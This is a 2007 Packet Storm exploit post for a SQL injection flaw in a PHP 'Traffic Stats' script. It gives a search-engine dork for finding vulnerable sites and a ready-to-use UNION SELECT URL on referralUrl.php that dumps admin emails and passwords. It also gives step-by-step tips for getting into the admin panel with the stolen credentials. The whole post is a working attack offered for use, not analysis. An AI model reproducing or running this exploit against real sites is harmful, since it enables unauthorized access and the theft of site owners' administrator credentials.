trafficstats-sql.txt

2007-07-17T00:00:00
ID PACKETSTORM:57772
Type packetstorm
Reporter t0pp8uzz
Modified 2007-07-17T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ Traffic Stats SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: N/A  
DORK: allintext:" If you would like to contact us, our email address is" traffic  
  
  
DESCRIPTION:  
pull out admin email/passwords  
  
  
EXPLOITS:  
http://server.com/Script_Dir/referralUrl.php?offset=-1/**/UNION%20ALL/**/SELECT%/**/1,2,concat(email,0x3a,password)/**/FROM/**/StatAdmin/*  
  
  
NOTE/TIP:  
first you must register a account then click ad site, and add random sites, then paste injection  
admin login is at /admin/ only password is needed :D  
  
  
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !  
  
  
--==+================================================================================+==--  
--==+ Traffic Stats SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
`